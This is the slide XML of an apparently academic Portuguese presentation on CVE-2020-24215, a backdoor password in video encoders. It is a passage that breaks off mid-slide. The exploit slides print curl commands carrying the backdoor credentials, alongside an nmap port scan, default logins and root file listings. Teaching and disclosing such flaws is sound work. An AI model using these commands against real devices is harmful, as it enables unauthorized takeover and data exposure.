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4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572" y="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B22B0-5EF6-413F-9ABE-C06F8B29A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C2F549-2B9C-449F-8F94-F8C9EE9D5C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D869E-8405-4A9C-B7AB-4911C2B7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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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3C577-1F63-4DAA-8853-C7B109ED4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5565F-2160-42E9-84AB-CAA84862F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6B82-608D-40CF-BDEF-DB19B28A857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36230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E0469-C788-43DC-AA66-DA7B4E822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322519-6FE5-4A26-AFF6-E59F957BF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F5DD6-9A1C-4171-B531-4D6DB9299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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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0906A-9678-4B82-AF94-1DDB4FE0C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BFE6B-0F8C-4372-BB25-3C7BD70DC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6B82-608D-40CF-BDEF-DB19B28A857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21511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E53CB8-FE53-4070-BA13-89DE2FB7D7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3D04FB-3079-45CA-AF5D-A8B3996DC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6111F-3D0B-4581-BE78-EFCCA626E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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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70897-0C1E-4F30-B253-182B3358B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9C4B9-0028-4920-B4B0-0B08C96E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6B82-608D-40CF-BDEF-DB19B28A857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95115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CE085-5A34-43C5-ABED-4D08036F0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C269B-D027-490C-AF6C-0C3125D37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B2684-7120-4321-A174-72B603E32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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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B5D3A-2BE2-40E7-826F-D8BC3875F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E5405-FECA-4A46-877C-9B469CD93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6B82-608D-40CF-BDEF-DB19B28A857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6877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CB7BE-B07F-450B-80D4-CAA22877A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E1816-E4D6-4803-B03E-853C075C0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3D8A0-390A-445A-AE48-54A1827D7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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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BA740-71CC-4C53-AEC3-C9CF0DF1A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ACFB6-0948-4187-854C-453A31AD3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6B82-608D-40CF-BDEF-DB19B28A857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62027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18238-D8AA-4AC8-960B-2D1647FDE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D3D17-48BA-4EC6-B3C9-D722DF860D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5D43A5-81EF-4404-BC3F-9BCD2B1D8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F8F7A0-B554-48CD-91B4-4AD009DF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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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B8083-B74C-4A32-BFDE-DC969ADF8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10B703-F123-4AD5-903F-EFF09F699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6B82-608D-40CF-BDEF-DB19B28A857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4996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F8E97-1104-4FEE-A1A6-1C2D71F9E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38D38-38E7-4AB7-B9A7-BB0294D01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ED8D44-1A03-4BFF-A1FD-31F932A9E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DEF4AE-1323-4561-9655-1B41BFE2F4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80EBA4-9F4C-415C-8825-CD23FE61B4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04DF76-6ADD-4868-96BC-340E2C7EA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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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0F19AA-8D62-41F7-9B6B-56AD45986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B7376B-D91C-45B7-B1BF-68041A780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6B82-608D-40CF-BDEF-DB19B28A857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41976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E5454-78BD-42E0-9BC8-4A0AD754B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0408A3-66FD-4F57-8EED-9EFC458DB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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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8E010E-94ED-4B72-863B-290C2D882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79B577-A5A2-43CC-9A76-667A0737D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6B82-608D-40CF-BDEF-DB19B28A857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5206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9B67C2-E7ED-4E5F-A02B-0EEF20204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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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8D8FAA-C9D2-4D3F-8B5D-FAD1457A1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A19BE-B10F-43AC-85E7-43FE4FB12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6B82-608D-40CF-BDEF-DB19B28A857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22734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D777A-1E6F-496D-87AB-182585FE2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AB2C2-3ECB-401E-86F5-020C63C6D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56A56E-6E13-42DC-A74E-C5C998484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9F5E2-94D6-4810-B50F-97EFD6AED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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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DC9104-FE5C-45D2-BD70-326D459ED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F35DDD-BFAE-4D4F-86F2-619ED22AE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6B82-608D-40CF-BDEF-DB19B28A857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93215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81F07-6808-4CF1-A7E8-AB164BDC4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E6E31C-5A55-4BD4-B9B4-E7B6D6B892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7A2CF6-B7D7-4C45-9B3E-0DFAA7AAC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1A9AB-6B24-4F63-9A78-68C99C0F5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48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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A1F80-8B45-43C9-B6F3-0AE2F5CC7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24E5D-3EA9-438A-A489-52231292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6B82-608D-40CF-BDEF-DB19B28A857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51353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0D37C8-00EE-4FB0-B739-38E47DB11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26AF6-E9D4-4F29-90D9-716D3E224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BA2B2-2F90-4C80-B8FB-99EB8B2CF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6A48C-4F2F-46D4-B4BB-34ACA202C445}" type="datetimeFigureOut">
              <a:rPr lang="pt-PT" smtClean="0"/>
              <a:t>21/10/2020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34491-3A38-4670-9C8C-99DD1A5D7A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360E9-B743-4FCC-ADFD-39989FF791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F6B82-608D-40CF-BDEF-DB19B28A857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17023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encoder/get_sy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DCE8A-2B79-4974-B80C-8811EC8BB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735291"/>
            <a:ext cx="10004981" cy="1244338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="pt-PT" sz="4400" dirty="0"/>
              <a:t>CVE-2020-24215 : Acesso total à interface de administrador via senha de backdoor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691369-4A8E-4160-BFCC-EBF0856C7D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8919" y="3012363"/>
            <a:ext cx="3714161" cy="833274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>André Rodrigues – up201505639</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Pedro Antunes – up201507254</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2887801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26A0C-AEB8-4BAC-B761-3A85F494B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Demonstração do Exploit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6CF131-7AE6-4865-A38A-5F2DDC35E7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86" y="2139885"/>
            <a:ext cx="10800428" cy="3376843"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2155697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26A0C-AEB8-4BAC-B761-3A85F494B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Demonstração do Exploit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4579066-522A-4075-8B2A-EE5C75D173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01" y="1932494"/>
            <a:ext cx="11413598" cy="255987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414BF1-91AC-464F-8358-E2E409EF0D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389201" y="5580668"/>
            <a:ext cx="709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Parece que temos uma Backdoor ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1704684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26A0C-AEB8-4BAC-B761-3A85F494B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Demonstração do Exploit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3E901B-FCF7-4457-84D7-5C38E5277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43647" cy="1115538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>$ curl --user admin:neworange88888888 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://encoder/get_sys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$ curl “http://encoder/get_sys?user=admin&amp;pass=neworange88888888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38C4DE-7CF5-490E-8B88-EBD6B1C011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941163"/>
            <a:ext cx="4826522" cy="38442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3634E3-675B-4FA5-AF53-0AA3BAFCE7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678" y="3317308"/>
            <a:ext cx="5524760" cy="309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128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64E41-086B-4077-9255-60D76CB0F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2169"/>
            <a:ext cx="10515600" cy="5554794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" b="1" dirty="0"/>
              <a:t>Impacto</a:t>
            </a:r>
            <a:endParaRPr lang="pt-PT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Controlo total do Sistema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Exposição de Informação Confidencial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Execução de código que consegue tomar posse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b="1" dirty="0"/>
              <a:t>Contramedidas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Contactar o vendedor e pedir uma resolução (fix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Conectar a uma rede confiável</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" sz="2000" dirty="0"/>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3176049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D149-00D4-4406-81BE-D1EDEBDF1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702"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Contexto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E929D7-213F-48BF-975A-6DF3C8EA7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06" y="1894437"/>
            <a:ext cx="5449478" cy="4219194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AC737B0-F331-4889-BCEE-C23EF3DBD2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032" y="1894437"/>
            <a:ext cx="5554694" cy="4219194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3AB6CE0-89B4-4FD4-A4F9-61B7C16F6551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348006" y="1084083"/>
            <a:ext cx="1140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O que é um codificador de video e como pode ter uma vulnerabilidade?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2448249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C8B4E-C837-4B3B-9105-6D25C364F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4689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Teoria do Exploit – Acesso à Interface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A9C10-CF57-4A75-84E8-CCD24D68A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7254"/>
            <a:ext cx="2932522" cy="5026893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>$ nmap -p 1-65535 encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-PT" sz="1800" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>PORT     STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" b="1" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>23/tcp   open  telnet</a:t>
            </a:r>
            <a:endParaRPr lang="pt-PT" sz="1800" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" b="1" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>80/tcp   open  http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>554/tcp  open  rtsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>1935/tcp open  rtmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>5150/tcp open  atmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>8086/tcp open  d-s-n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>8554/tcp open  rtsp-alt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1415"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>9588/tcp open  unknown</a:t>
            </a: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1823C48-16EE-4062-976C-ECA62C00C47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5916891" y="2977299"/>
            <a:ext cx="4405460" cy="90340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 dirty="0"/>
              <a:t>Username: admin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PT" dirty="0"/>
              <a:t>Password: admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072814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C8B4E-C837-4B3B-9105-6D25C364F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4689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Teoria do Exploit - Firmware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A9C10-CF57-4A75-84E8-CCD24D68A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6070" y="989814"/>
            <a:ext cx="3073925" cy="517312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PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>$ tree -d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>├── disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>├── ko</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>│   └── extdrv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>├── lib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>├── nginx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>│   ├── conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>│   ├── html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>│   ├── logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>│   └── sbin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>└── web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>    ├── css</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>    ├── images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>    ├── js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>    └── player</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1415"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1800" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>        └── icons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-P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A7C39C-F49F-4098-AD71-5007F6B42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07" y="1416377"/>
            <a:ext cx="5738177" cy="402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09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6F7AD-9500-4CF4-8CBF-2E0725027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5518"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-PT" dirty="0"/>
              <a:t>Teoria do Exploit – Permissoes de Root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E8D7D-478C-400B-8DDA-BA34EF26F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0643"/>
            <a:ext cx="4874443" cy="571735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PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>$ ls –l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>total 12756</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root     307 Jul 14 08:31 box.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" b="1" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root 6533364 Jul 14 08:31 box.v400_hdmi</a:t>
            </a:r>
            <a:endParaRPr lang="pt-PT" sz="1300" kern="150" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Liberation Mono"/>
              <a:ea typeface="Noto Sans Mono CJK SC"/>
              <a:cs typeface="Liberation Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>drwx------ 2 root root    4096 Jul 14 08:31 disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root 2972924 Jul 14 08:31 font.ttf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
                <a:ea typeface="Noto Sans Mono CJK SC"/>
                <a:cs typeface="Liberation Mono"/>
              </a:rPr>
              <a:t>-rw------- 1 root root 1570790 Jul 14 08:31 hostapd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-PT" sz="1300" kern="150" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Liberation Mono"/>
